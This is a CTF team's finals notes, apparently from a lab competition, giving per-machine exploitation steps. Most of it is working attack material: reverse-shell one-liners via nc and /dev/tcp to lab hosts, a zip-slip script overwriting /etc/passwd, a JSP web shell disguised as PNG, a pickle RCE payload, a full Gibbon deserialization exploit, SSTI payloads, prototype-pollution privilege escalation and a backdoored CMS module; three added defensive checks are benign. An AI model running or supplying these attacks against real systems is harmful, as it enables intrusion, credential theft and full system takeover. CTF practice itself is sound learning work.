# Ouroboros Code 😎 Finals Hackmex 2025
## Kd3na Notes
### bagman
Bagisto, `/admin`, credentials `admin@bagman.echocit..... :admin123`
SSTI to RCE: https://siltonrenato02.medium.com/a-brief-summary-about-a-ssti-to-rce-in-bagisto-e900ac450490
`sudo -l`
```python
import zipfile

# Your /etc/passwd content
passwd_content = """root:$1$kd3n4$5P7sUTeqttfdak/c/wnzx/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
polkitd:x:997:997:polkit:/nonexistent:/usr/sbin/nologin
mysql:x:102:103:MySQL Server,,,:/nonexistent:/bin/false
ETSCTF:x:1000:65534:ETSCTF_7ae22738569005ee2b271141c8f40656:/home/ETSCTF:/bin/bash
"""

with zipfile.ZipFile("evil.zip", "w", zipfile.ZIP_DEFLATED) as z:
    # Traversal path to overwrite /etc/passwd
    z.writestr("../../../../etc/passwd", passwd_content)
print("[+] evil.zip created with traversal to /etc/passwd")
```
```bash
sudo /usr/bin evil.zip
ssh root@ip
```
pass: kd3n4
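Defensive counterpart, added here and not part of the original notes: a check that refuses archive members which would land outside the extraction directory (the `../../../../etc/passwd` entry above, and absolute names). The sample archive is constructed in memory; `/tmp/extract_here` is an assumed destination.

```python
import io
import os
import zipfile


def unsafe_entries(zip_bytes: bytes, dest_dir: str) -> list:
    """Return the member names that resolve outside dest_dir.

    Both "../" traversal and absolute member names are caught: the resolved
    target must share dest_dir as its common path, not merely as a string prefix
    (so "/tmp/extract_here2/x" is also rejected for dest "/tmp/extract_here").
    """
    dest = os.path.realpath(dest_dir)
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        for name in z.namelist():
            target = os.path.realpath(os.path.join(dest, name))
            if os.path.commonpath([dest, target]) != dest:
                bad.append(name)
    return bad


def safe_extract(zip_bytes: bytes, dest_dir: str) -> None:
    """Extract only when every member stays inside dest_dir; otherwise refuse the whole archive."""
    bad = unsafe_entries(zip_bytes, dest_dir)
    if bad:
        raise ValueError(f"refusing to extract, traversal entries: {bad}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        z.extractall(dest_dir)


def build_sample(names) -> bytes:
    """Constructed test archive: one dummy file per given member name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for n in names:
            z.writestr(n, "x")
    return buf.getvalue()


if __name__ == "__main__":
    evil = build_sample(["../../../../etc/passwd", "docs/readme.txt"])
    print(unsafe_entries(evil, "/tmp/extract_here"))
```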
### hackflix
https://www.exploit-db.com/exploits/52079
`"; nc -e /bin/bash 10.10.2.30 5555&& echo 'poc'"`
### chiseler
Mine got wiped.
Post exploitation:
siyuan-v3.1.15-CVE-2024-55658
https://github.com/siyuan-note/siyuan/security/advisories/GHSA-25w9-wqfq-gwqx
https://github.com/siyuan-note/siyuan/security/advisories/GHSA-xx68-37v4-4596
https://github.com/siyuan-note/siyuan/security/advisories/GHSA-fqj6-whhx-47p7
https://github.com/siyuan-note/siyuan/security/advisories/GHSA-4pjc-pwgq-q9jp
https://github.com/siyuan-note/siyuan/security/advisories/GHSA-8fx8-pffw-w498
node-dot-diver-v1.0.1-CVE-2023-45827
https://github.com/advisories/GHSA-9w5f-mw3p-pj47
https://github.com/clickbar/dot-diver/commit/9790834cf4c2bca75db00e588e58056dacaf602f
https://github.com/clickbar/dot-diver/commit/98daf567390d816fd378ec998eefe2e97f293d5a
https://nvd.nist.gov/vuln/detail/CVE-2023-45827
### waveweaver
http://10.0.2.0/administrator/#
admin:admin
```
POST /administrator/admin_smtp.php?action=set HTTP/1.1
Host: 10.0.3.2
Referer: http://10.0.3.2/administrator/admin_smtp.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=b93h0q49d6qqm2k8d1ceceg4f4

smtpserver=smtp.qq.com&smtpserverport=465&smtpusermail=12345%40qq.com&smtpname=%E6%B5%B7%E6%B4%8B%E5%BD%B1%E8%A7%86%E7%BD%91&smtpuser=12345%40qq.com&smtppass=123456789&smtpreg=off&smtppsw=${eval($_POST[1])}
```
```
POST /data/admin/smtp.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

1=system('nc+-e+/bin/bash+10.10.3.70+1234');
```
Priv Esc
https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884
Nasty privesc, this one only half works.
```bash
sudo /opt/node/bin/xpathson '$[?(var _$_root=[].constructor.constructor("console.log(this.process.mainModule.require(\\"child_process\\").execSync(\\"bash -c 'bash -i >& /dev/tcp/10.10.3.70/4444 0>&1'\\").toString())");@root())]' poc.json
```
```
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.3.70] from (UNKNOWN) [10.0.3.2] 55328
bash: 1\\").toString())");@root())]: ambiguous redirect
```
```bash
chmod +s /bin/bash
touch /tmp/hola
```
## jospit007 Notes
### squashpwn
Credentials admin:admin
CrushFTP service - ports 21, 22, 443, 222, 8080, 9090
PoC URL --> `https://github.com/Stuub/CVE-2024-4040-SSTI-LFI-PoC`
Run the following command to get the SSH key of the ETSCTF user:
`python3 crushed.py -t https://10.0.1.3 --lfi "/home/ETSCTF/.ssh/id_rsa"`
Once inside, `sudo -l` shows the binary; privileges are escalated with the following command:
`sudo /usr/local/bin/ppdl 'https://localhost/?$(chmod +s /bin/bash)'`
`bash -p`
### solidor
credentials: **admin:admin**
Login URL
`http://solidor.echocity-f.com/index.php?m=core&f=index&_su=wuzhicms`
It is an RCE - here is how to exploit the CMS `https://github.com/wuzhicms/wuzhicms/issues/188`
With a session open, copy and paste this URL; the response will contain the result of the command execution
`http://solidor.echocity-f.com/index.php?m=attachment&f=index&v=set&_su=wuzhicms&submit=1&setting=%3C?php%20echo%20exec(%27whoami%27);?%3E`
For the reverse shell:
`http://solidor.echocity-f.com//index.php?m=attachment&f=index&v=set&_su=wuzhicms&submit=1&setting=%3C%3Fphp%20echo%20exec%28%27nc%2010.10.4.22%208090%20-e%20%2Fbin%2Fsh%27%29%3B%20%3F%3E`
Once inside, `sudo -l`:
```
User www-data may run the following commands on solidor:
    (ALL : ALL) NOPASSWD: /opt/node/bin/domit
```
PRIVESC
Start the listener `nc -lvnp 8090`
Run the following commands in the victim's reverse shell
```bash
echo '#!/bin/bash
bash -i >& /dev/tcp/10.10.4.22/8090 0>&1' > /tmp/shell.sh
chmod +x /tmp/shell.sh
```
Then the following command:
```bash
sudo /opt/node/bin/domit '<div></div>' 'nodeName.constructor.constructor("global.AdminExec(String.fromCharCode(47,116,109,112,47,115,104,101,108,108,46,115,104))")()'
```
The above gives us a root shell
### mellowtide
credentials **msopen:msopen**
login at: `http://10.0.8.2:8080/ms/login.do`
It has a CMS that may be vulnerable to RCE via file upload --> `https://xz.aliyun.com/news/16067`
The following script generates a ZIP that already meets the conditions for uploading the file as a template
```python
#!/usr/bin/env python3
# jsp_png.py - creates shell.jsp with a PNG header and packs it into mi.zip
import os
import zipfile

png_header = b'\x89PNG\r\n\x1a\n'
jsp = """<%@ page import="java.io.InputStream,java.io.BufferedReader,java.io.InputStreamReader" %>
<%@ page contentType="text/html; charset=UTF-8" language="java" %>
<html>
<head><title>shell</title></head>
<body>
<%
// Runs the command passed in the "cmd" parameter and writes its output
String cmd = request.getParameter("cmd");
if (cmd != null) {
    try {
        Process process = Runtime.getRuntime().exec(cmd);
        InputStream inputStream = process.getInputStream();
        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
        String line;
        while ((line = bufferedReader.readLine()) != null) {
            response.getWriter().print(line + "\\n");
        }
        bufferedReader.close();
    } catch (Exception e) {
        response.getWriter().print("ERR: " + e.getMessage());
    }
} else {
    response.getWriter().print("no cmd param");
}
%>
</body>
</html>
"""

# Name and layout inside the ZIP
out_dir = "miruta"       # change this if you want another path
out_name = "shell.jsp"   # name of the jsp inside the zip
zip_name = "mi.zip"      # resulting zip

# Make sure the folder exists
os.makedirs(out_dir, exist_ok=True)

# Create shell.jsp as PNG header + JSP (JSP text -> utf-8 bytes)
path = os.path.join(out_dir, out_name)
with open(path, "wb") as f:
    f.write(png_header + jsp.encode("utf-8"))
print(f"Created {path}")

# Create the zip (without extra metadata)
with zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) as zf:
    # Store it with a relative path inside the zip
    zf.write(path, arcname=os.path.join(out_dir, out_name))
print(f"Generated {zip_name}")
```
Once you have the ZIP, add it when uploading a template
In the upload request, change the GIF89a header
Once it is uploaded, visit the path
`http://10.0.10.1:8080/template/1/miruta/shell.jsp?cmd=nc%20-e%20/bin/bash%2010.10.2.30%205555`
the above gives you the shell as **root**
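Defensive counterpart, added here and not from the original notes or the CMS: an upload check that walks the PNG chunk list instead of trusting the 8-byte signature, so a JSP with a PNG header glued on (as built above) is rejected. The 1x1 PNG and the polyglot sample are constructed inline.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunks_valid(data: bytes) -> tuple:
    """Return (ok, reason) for a byte string that claims to be a PNG.

    A real PNG is the signature, a 13-byte IHDR chunk, further chunks each with
    a correct CRC, and exactly nothing after the IEND chunk. Signature + JSP
    fails at the first chunk header; PNG + appended script fails at IEND.
    """
    if not data.startswith(PNG_SIG):
        return False, "missing PNG signature"
    pos = len(PNG_SIG)
    first = True
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if first and (ctype != b"IHDR" or length != 13):
            return False, "first chunk is not a 13-byte IHDR"
        first = False
        end = pos + 12 + length  # 4 length + 4 type + body + 4 CRC
        if end > len(data):
            return False, "truncated %r chunk" % ctype
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:end])
        if zlib.crc32(ctype + body) != crc:
            return False, "bad CRC on %r chunk" % ctype
        pos = end
        if ctype == b"IEND":
            if pos == len(data):
                return True, "ok"
            return False, "trailing data after IEND"
    return False, "no IEND chunk"


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Encode one PNG chunk with its CRC (used only to build the benign sample)."""
    return (struct.pack(">I", len(body)) + ctype + body
            + struct.pack(">I", zlib.crc32(ctype + body)))


def minimal_png() -> bytes:
    """Constructed 1x1 8-bit grayscale PNG that passes the check."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # one scanline: filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


# Constructed stand-in for the uploaded file: signature followed by JSP text.
POLYGLOT_SAMPLE = PNG_SIG + b'<%@ page language="java" %>\n<% out.print("hello"); %>\n'

if __name__ == "__main__":
    print(png_chunks_valid(minimal_png()))
    print(png_chunks_valid(POLYGLOT_SAMPLE))
```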
### sheetshow
## Lanavarrog Notes
### nacelle
### schedzilla
### keymasher
### plagiarize
first access
replicate the OS command injection by hand as in the blog
https://rehmeinfosec.de/labor/cve-2023-45869
but with this payload
```
200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && nc -e /bin/bash IP PORT) #
```
privesc
```python
# build the payload
import pickle

class P:
    def __reduce__(self):
        return (__import__('os').system, ('chmod +s /bin/bash',))

with open("payload_pik", "wb") as f:
    f.write(pickle.dumps(P()))
```
download the payload_pik file onto the machine
then query localhost
```bash
curl -X POST http://127.0.0.1:3000/summarize -H 'Content-Type: application/vnd.bentoml+pickle' --data-binary "@payload_pik"
```
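Defensive counterpart, added here and not from the original notes or from BentoML: an allow-listing Unpickler that refuses the `os.system` global before any reduce call runs, which is what an endpoint accepting a pickle body would need. Both pickle streams are constructed inline; the "malicious" one calls the harmless `true`.

```python
import io
import os
import pickle

# Allow-list of (module, name) pairs the unpickler may resolve. Everything else,
# including os.system, is refused while the stream is still being parsed.
ALLOWED_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every GLOBAL/STACK_GLOBAL opcode, i.e. before the callable is invoked
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_safe_pickle(data: bytes) -> bool:
    """True if the stream loads under the allow-list, False if it names a forbidden global."""
    try:
        restricted_loads(data)
        return True
    except (pickle.UnpicklingError, EOFError):
        return False


# Constructed samples: a benign request body, and a reduce-style stream of the
# same shape as the notes' payload (the command here is the harmless 'true').
BENIGN_PICKLE = pickle.dumps({"text": "summarize this", "max_len": 40})


class _Reducer:
    def __reduce__(self):
        return (os.system, ("true",))


MALICIOUS_PICKLE = pickle.dumps(_Reducer())

if __name__ == "__main__":
    print(is_safe_pickle(BENIGN_PICKLE), is_safe_pickle(MALICIOUS_PICKLE))
```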
## MrQuezo Notes
### herbage
Credentials: superadmin:superadmin (useless)
```bash
curl --path-as-is http://10.0.3.4:3000/assets/../../../../../../../../home/ETSCTF/.ssh/id_rsa -o id_rsa
```
Give permissions to id_rsa and use it as root
### vitelized
### stinkum
admin:admin
### ollaim
### zoocreeper
Laborious machine; this note and these steps are needed
https://github.blog/security/vulnerability-research/3-ways-to-get-remote-code-execution-in-kafka-ui/#cve-2023-25194-rce-via-jndiloginmodule
Requires JAVA 8 - https://download.oracle.com/otn/java/jdk/8u181-b13/96a7b8442fe848ef90c96a2fad6ed6d1/jdk-8u181-linux-x64.tar.gz?AuthParam=1759443225_4167c0fead65a8fcab1e9b5314fa39fc
```bash
git clone https://github.com/artsploit/ysoserial/
cd ysoserial && git checkout scala1
apt-get install mvn -y
mvn package -D skipTests=true  # make sure you use Java 8 for compilation, it might not compile with recent versions
java -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1718 CommonsCollections7 "nc -e /bin/bash 10.10.2.30 5555"
```
Burp payload (no authentication required); only the rmi object is relevant
```
PUT /api/config/validated HTTP/1.1
Host: 10.0.20.3:8080
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Origin: http://10.0.20.3:8080
Accept: */*
Content-Type: application/json
Connection: keep-alive
Content-Length: 384

{"properties":{"kafka":{"clusters":[{"name":"test","bootstrapServers":"10.10.3.70:8000","properties":{"security.protocol":"SASL_PLAINTEXT","sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://10.10.3.70:1718/x\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"x\";","sasl.mechanism":"x"},"readOnly":false}]}}}
```
## Shanehrd07 Notes
### queueflop
Credentials: admin:admin123; file upload: https://github.com/ctg503/bug_report/blob/main/vendors/oretnom23/dynamic-transaction-queuing-system/RCE-1.md
PRIVESC
https://security.snyk.io/vuln/SNYK-JS-NPMPROGRAMMATIC-564115
`sudo /usr/local/bin/npm-problematic '$(comando)'`
### serialies
Access to the passwd file
https://security.snyk.io/vuln/SNYK-JS-MARKDOWNPDF-5411358
**Payload**
```html
<script>
// Path Disclosure
document.write(window.location);
// Arbitrary Local File Read
xhr = new XMLHttpRequest;
xhr.onload=function(){document.write((this.responseText))};
xhr.open("GET","file:///home/ETSCTF/.ssh/id_ed25519");
xhr.send();
</script>
```
PrivEsc
```
node inspect 127.0.0.1:1313
exec('require("child_process").execSync("chmod +s /bin/bash")')
```
### mapipulate
Credentials: admin:geoserver
Initial access https://www.vicarius.io/vsociety/posts/geoserver-rce-cve-2024-36401 - https://github.com/Warxim/CVE-2022-41852/tree/main
Follow the instructions to run the exploit
### relucer
Credentials: root:root
https://cxsecurity.com/issue/WLB-2024040049
privesc
```bash
echo '#!/bin/bash' > /tmp/pwn.sh
echo '/bin/chmod u+s /bin/bash' >> /tmp/pwn.sh
echo 'exit 0' >> /tmp/pwn.sh
chmod +x /tmp/pwn.sh
echo "BASH_ENV=/tmp/pwn.sh" > /tmp/.env_exploit
sudo /usr/local/bin/dotenv /tmp/.env_exploit
```
The course must be created with the contents of the git example, and the tool must be allowed to connect to the Git repo over SSH
To create the course:
```bash
git clone --branch bs-5 --bare https://github.com/inducer/relate-sample.git
```
`ahvega@10.10.0.30:/home/ahvega/ArchivosAPasar/relate-sample.git`
CVE-2024-32404
```
# Exploit Title: Relate Learning And Teaching system Version before 2024.1 SSTI(Markup Sandbox function) lead to RCE
# Date: 19/04/2024
# Exploit Author: kai6u
# Vendor Homepage: https://github.com/inducer/
# Software Link: https://github.com/inducer/relate
# Affected Version: before 2024.1 (https://github.com/inducer/relate/commit/2fdbd4480a2d0a45c746639be244a61a0d4112b6)
# Fixed Version: 2024.1 (https://github.com/inducer/relate/commit/d9fa7dcb84b8e5a64ce78ced4f56cdd61c0d59aa)
# Tested on: Ubuntu 22.04
# Summary: SSTI Markup Sandbox function of Relate Learning And Teaching system
```
3) Next, the attacker modifies the above payload to execute arbitrary commands by changing the subclasses index number to the number of popen.
* Payload:
* `{{ 'abc'.__class__.__base__.__subclasses__()[210]('whoami',shell=True,stdout=-1).communicate()[0].strip() }}`
`{{ 'abc'.__class__.__base__.__subclasses__()[224]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip() }}`
## Shuciran Notes
### drugstore
### repomaniac
Credentials: admin@repomaniac.echocity-f.com:password
https://www.exploit-db.com/exploits/52348
```bash
└─$ python 52348.py http://10.0.5.0:3000/ administrator:administrator /home/kali/.ssh/id_rsa /home/kali/.ssh/id_rsa.pub "nc -e /bin/bash 10.10.2.30 5555" --ssh-port 2222
```
```
ETSCTF@repomaniac:/opt/gogs$ sudo /opt/node/bin/json-extender '{"__proto__": { "user": "../..", "file": "root/.ssh/id_rsa" }}'
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
```
### kapi
Credentials: admin:XXadmin1234XX
```python
# Exploit Title: Gibbon LMS has a PHP Deserialization vulnerability on the v26.0.00 version
# Date: 22.01.2024
# Exploit Author: SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev )
# Vendor Homepage: https://gibbonedu.org/
# Software Link: https://github.com/GibbonEdu/core
# Version: v26.0.00
# Tested on: Ubuntu 22.0
# CVE : CVE-2024-24725
import requests
import re
import sys
import base64
import urllib.parse

# Proxy configuration - modify these as needed
PROXY = {
    'http': 'http://127.0.0.1:8080',  # Burp Suite proxy
    'https': 'http://127.0.0.1:8080'
}
# Set to False if you don't want to use proxy
USE_PROXY = False  # Disabled for now to test


def login(target_host, target_port, email, password):
    if "http" in target_host:
        url = f'{target_host}/login.php?timeout=true'
    else:
        url = f'http://{target_host}:{target_port}/login.php?timeout=true'
    headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"}
    data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"
    proxies = PROXY if USE_PROXY else None
    # Create session to handle cookies better
    session = requests.Session()
    try:
        r = session.post(url, headers=headers, data=data, allow_redirects=False, proxies=proxies, verify=False)
        print(f"[*] Login URL: {url}")
        print(f"[*] Response status: {r.status_code}")
        print(f"[*] Response headers: {r.headers}")
        # Debug: Print all set-cookie headers
        if 'Set-Cookie' in r.headers:
            print(f"[*] Set-Cookie header: {r.headers['Set-Cookie']}")
        # Check if login was successful by looking for redirect to index.php
        if r.status_code == 302 and 'Location' in r.headers and '/index.php' in r.headers['Location']:
            print("[+] Login successful! (Redirect to index.php detected)")
            # Get cookies from session
            cookies = session.cookies.get_dict()
            print(f"[*] Session cookies: {cookies}")
            # Build cookie string
            cookie_parts = []
            for key, value in cookies.items():
                cookie_parts.append(f"{key}={value}")
            cookie_string = "; ".join(cookie_parts)
            print(f"[+] Final cookie: {cookie_string}")
            return cookie_string
        else:
            print("[-] Login failed - no redirect to index.php")
            print(f"[-] Location header: {r.headers.get('Location', 'None')}")
            return None
    except Exception as e:
        print(f"[-] Login error: {e}")
        return None


def generate_payload(command):
    # Given base64-encoded string
    base64_encoded_string = 'YToyOntpOjclM0JPOjMyOiJNb25vbG9nXEhhbmRsZXJcU3lzbG9nVWRwSGFuZGxlciI6MTp7czo5OiIlMDAqJTAwc29ja2V0IiUzQk86Mjk6Ik1vbm9sb2dcSGFuZGxlclxCdWZmZXJIYW5kbGVyIjo3OntzOjEwOiIlMDAqJTAwaGFuZGxlciIlM0JyOjMlM0JzOjEzOiIlMDAqJTAwYnVmZmVyU2l6ZSIlM0JpOi0xJTNCczo5OiIlMDAqJTAwYnVmZmVyIiUzQmE6MTp7aTowJTNCYToyOntpOjAlM0JzOkNPTU1BTkRfU0laRToiQ09NTUFORCIlM0JzOjU6ImxldmVsIiUzQk4lM0J9fXM6ODoiJTAwKiUwMGxldmVsIiUzQk4lM0JzOjE0OiIlMDAqJTAwaW5pdGlhbGl6ZWQiJTNCYjoxJTNCczoxNDoiJTAwKiUwMGJ1ZmZlckxpbWl0IiUzQmk6LTElM0JzOjEzOiIlMDAqJTAwcHJvY2Vzc29ycyIlM0JhOjI6e2k6MCUzQnM6NzoiY3VycmVudCIlM0JpOjElM0JzOjY6InN5c3RlbSIlM0J9fX1pOjclM0JpOjclM0J9'
    command_size = len(command)
    # Decode base64
    decoded_bytes = base64.b64decode(base64_encoded_string)
    decoded_string = decoded_bytes.decode('utf-8')
    # URL decode
    payload = urllib.parse.unquote(decoded_string)
    # Replace placeholders in the decoded string
    payload = payload.replace('COMMAND_SIZE', str(command_size))
    payload = payload.replace('COMMAND', command)
    print("[+] Payload Generated!")
    return payload


def rce(cookie, target_host, target_port, command):
    if "http" in target_host:
        url = f'{target_host}/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'
    else:
        url = f'http://{target_host}:{target_port}/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'
    headers = {
        "Content-Type": "multipart/form-data; boundary=---------------------------104550429928543086952438317710",
        "Cookie": cookie,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }
    payload = generate_payload(command)
    data = f'-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="address"\r\n\r\n/modules/System Admin/import_run.php\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="mode"\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncField"\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncColumn"\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="columnOrder"\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:form-data; name="columnText"\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="fieldDelimiter"\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="stringEnclosure"\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="filename"\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="csvData"\r\n\r\n"External Assessment","Assessment Date","Student","Field Name Category","Field Name","Result"\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="ignoreErrors"\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="Failed"\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--'
    proxies = PROXY if USE_PROXY else None
    try:
        r = requests.post(url, headers=headers, data=data, allow_redirects=False, proxies=proxies, verify=False)
        print("[+] Request sent!")
        print(f"[*] Response status: {r.status_code}")
        # Check for different possible response patterns
        if "Step 4 - Live Run" in r.text:
            start_index = r.text.find("<h2>Step 4 - Live Run</h2>")
            if start_index != -1:
                end_index = r.text.find("<div class", start_index)
                if end_index != -1:
                    result = r.text[start_index+26:end_index].strip()
                    if result and len(result) > 0:
                        print("[+] Execution result: \n"+result)
                    else:
                        print("[-] Command executed but no output returned")
                else:
                    print("[-] Could not find end of output")
            else:
                print("[-] Could not find execution results section")
        else:
            print("[-] Unexpected response format")
        # Save response for analysis
        with open("debug_response.html", "w", encoding='utf-8') as f:
            f.write(r.text)
        print("[+] Response saved to debug_response.html for analysis")
    except Exception as e:
        print(f"[-] RCE request error: {e}")


if __name__ == '__main__':
    if len(sys.argv) != 6:
        print("[*] Usage: script.py <target_host> <target_port> <email> <password> <command>")
        print("[*] Example: python gibbon_rce.py kapi.echocity-f.com 80 admin password \"whoami\"")
        sys.exit(1)
    # Disable SSL warnings for cleaner output
    import urllib3
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    target_host = sys.argv[1]
    target_port = sys.argv[2]
    email = sys.argv[3]
    password = sys.argv[4]
    command = sys.argv[5]
    print(f"[*] Target: {target_host}:{target_port}")
    print(f"[*] Credentials: {email}:{password}")
    print(f"[*] Command: {command}")
    cookie = login(target_host, target_port, email, password)
    if cookie:
        print(f"[+] Using cookie: {cookie}")
        rce(cookie, target_host, target_port, command)
    else:
        print("[-] Exploit failed: Could not authenticate")
        print("[*] Tips:")
        print("    - Check if credentials are correct")
        print("    - Verify the target is accessible")
        print("    - Check if Gibbon School Year ID needs adjustment")
```
```bash
python3 exploit.py kapi.echocity-f.com 80 admin XXadmin1234XX "nc -e /bin/bash 10.10.3.46 1234"
```
**For root**
```bash
cat > /tmp/poc.yml <<'YAML'
__proto__:
  hostname: "localhost"
  container:
    name: "localhost"
  CVE:
    - "CVE-0000-0000"
  entrypoint:
    file: "/root/.ssh/authorized_keys"
    content: |
      ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYPGRp2MbV2XfwiGUHtUxhJlSU5OkkUEmoqjgFAFHXiev0XEE9bBVSmtHyBaOH+TJXfhW9zAwN8seWtd0OZIMgJBzxL+UlPxRNYnNavDOkGyYotdbgTdmAaGSio8X0wF4GuWFeZUxjKIaUA/y2OBcGVGXi024RxhzP9mukVf1uaI7Jv50v62UL/eaxdIXh+YTHGajtOSrFu5Xvnz2c1PFutTmllEGjl0/eF7qoZUgMFMd4vkhUHoVms4yy7LtNYWDmuB46FVr3DmIVnDQi3LzMOwQa+cQPBunYeYRhtME8Aiu1o0njkCHB6feSKc2gopnGnhye737F1aDX2wIwmLWAaqH4CayxkuBMm+h3cljEHd0DdIVahEtJJNg+nVvdl1qvhzD6zFs7IqYsAZv7af80YRGqqP6LN151U3Y1HKKnBZPCKc2O54kBbs4xH/j2VOUq9hfzth6BzbFrN7qub6K2US/cQMMPH3Xvq8Zpge+mrjpjgKLtUK7Td3B5oWbgiRc= kali@kali
YAML
```
```bash
sudo /opt/node/bin/yml2json /tmp/poc.yml
```
AND WE ARE INSIDE (Login as root with id_rsa)
### oopsbucket
### wiredo
Admin URL: http://TARGET/processwire
Credentials: admin:XXadmin1234XX
Download the module:
https://github.com/frameless-at/StripePlMailchimpSync/archive/main.zip
```bash
unzip StripePlMailchimpSync-main.zip
nano StripePlMailchimpSync.module.php
```
Go to the very end of the module and modify it like this:
```php
    protected function splitFullNameSmart(string $full): array {
        $full = trim(preg_replace('~\s+~u', ' ', $full));
        if($full === '') return ['first' => '', 'last' => ''];
        $parts = preg_split('~\s+~u', $full) ?: [];
        if(count($parts) === 1) return ['first' => $parts[0], 'last' => ''];
        $last = array_pop($parts);
        return ['first' => implode(' ', $parts), 'last' => $last];
    }
}
system("nc -e /bin/bash 10.10.3.46 1234");
```
Then follow these steps:
https://cupc4k3.medium.com/cve-2023-24676-the-power-of-remote-file-inclusion-in-proccesswire-cms-a8fa5ace3255
But instead of modifying the HTTP request go to:
Modules > New, scroll down to "Add Module from Upload", upload the .zip and start your listener.
For privesc create this file:
```bash
cat > /tmp/evil.json <<'EOF'
{"constructor":{"prototype":{"authorized":true,"username":"root","command":"chmod +s /bin/bash"}}}
EOF
```
```bash
